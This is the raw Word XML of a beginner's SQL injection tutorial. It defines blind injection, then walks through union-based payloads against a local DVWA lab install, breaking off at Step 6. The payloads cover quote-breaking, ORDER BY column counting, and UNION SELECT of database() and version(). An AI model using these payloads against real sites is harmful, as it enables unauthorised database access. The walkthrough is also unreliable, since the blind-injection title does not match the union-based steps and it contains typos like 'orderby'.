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b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Blind Based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>what is Based Sql injection ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL (Structured Query Language) injection is a type of </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:color w:val="000000"/>
            <w:spacing w:val="0"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is nearly identical to normal </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>SQL Injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>When we use blind based sql injection ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>When we brake the query if we can not get the error , we can use the blind based sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>There are two type of blind based sql Injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1.Boolean based sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2.Time based sql injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1.Boolean based sql Injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana;sans-serif" w:hAnsi="Verdana;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The following steps describe the union based injection :-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Target :- dvwa </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Change the dvwa  security to “LOW”;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>step 1:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>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To find 'GET' parameter</w:t>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like :- 1.id=cat</w:t>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2.id=1</w:t>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3.id=query</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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>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click on sql injection and type any number and submit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>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we can get the get perameter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:sz w:val="3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32"/>
          <w:szCs w:val="32"/>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24"/>
          <w:szCs w:val="24"/>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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
        <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#</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i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
      </w:pP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18"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>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szCs w:val="36"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve">step 2 :-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To generate a SQL error, to break the </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query.</w:t>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So that we can get which database it has been buit</w:t>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hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>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and 1=1 &amp;Submit=Submit#</w:t>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You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1</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szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 :-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To count the number of columns, in the  </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 xml:space="preserve">           </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web application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>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18"/>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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>For counting the number of columns, we will use order by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>firstly we will check from 10 , 5 and so on .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="white"/>
            <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>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24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif" w:hAnsi="Consolas;Menlo;Monaco;Lucida Console;Liberation Mono;DejaVu Sans Mono;Bitstream Vera Sans Mono;monospace;serif"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:bdr w:val="single" w:sz="2" w:space="6" w:color="DDDDDD"/>
        </w:rPr>
        <w:t xml:space="preserve"> and 1=1 orderby 2--+ &amp;Submit=Submit#</w:t>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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we got result </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>so it has 2 columns .</w:t>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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 :- get the the database name with union select </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szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>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 xml:space="preserve"> and 1=1 union select 1,database()--+ &amp;Submit=Submit#</w:t>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r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Here we get the name of the database a dvwa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>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sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pP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36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 5 :-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">find out the version </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">This command will help to find out the version </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
          </w:rPr>
          <w:t>http://127.0.0.1/dvwa/vulnerabilites/sqli/?id=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>’ and 1=1 union select 1,version() --+ &amp;submit=submit#</w:t>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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Step 6:-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
